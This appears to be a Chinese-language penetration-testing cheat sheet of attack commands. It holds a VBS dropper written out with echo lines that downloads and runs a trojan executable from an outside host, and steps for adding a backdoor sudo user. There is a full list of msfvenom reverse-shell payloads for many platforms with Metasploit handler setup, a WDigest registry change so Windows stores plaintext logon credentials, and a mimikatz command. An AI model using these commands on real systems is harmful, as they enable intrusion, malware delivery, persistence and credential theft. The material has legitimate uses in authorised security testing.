https://github.com/Sab0tag3d/SIET Cisco路由器smart install漏洞利用
https://github.com/cisco-config-analysis-tool/ccat Cisco配置文件解析
https://github.com/n1nj4sec/pupy python渗透工具包
https://github.com/RUB-NDS/PRET 打印机漏洞利用

echo Set Post = CreateObject(“Msxml2.XMLHTTP”) >>zl.vbs
echo Set Shell = CreateObject(“Wscript.Shell”) >>zl.vbs
echo Post.Open “GET”,”http://www.jbzj.com/muma.exe”,0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject(“ADODB.Stream”) >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile “c:\zl.exe”,2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run (“c:\zl.exe”) >>zl.vbs

权限维持

添加用户,非交互式设置密码并加入sudo组
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
移动home目录:sudo usermod -d /path/to/new/home -m username

文件下载

tar -cvf log.tar log2012.log 仅打包,不压缩!
tar -zcvf log.tar.gz log2012.log 打包后,以 gzip 压缩
tar -jcvf log.tar.bz2 log2012.log 打包后,以 bzip2 压缩

python -m SimpleHTTPServer 8001

<?php
if (isset($_POST[“AAA”])){
echo “ISSET”;
}else{
echo “UNSET”;
}

这里要构造表单的
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

或者直接burp改,但是必须要Content-Type: application/x-www-form-urlencoded

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
对应操作系统使用32或64位程序、
privilege::debug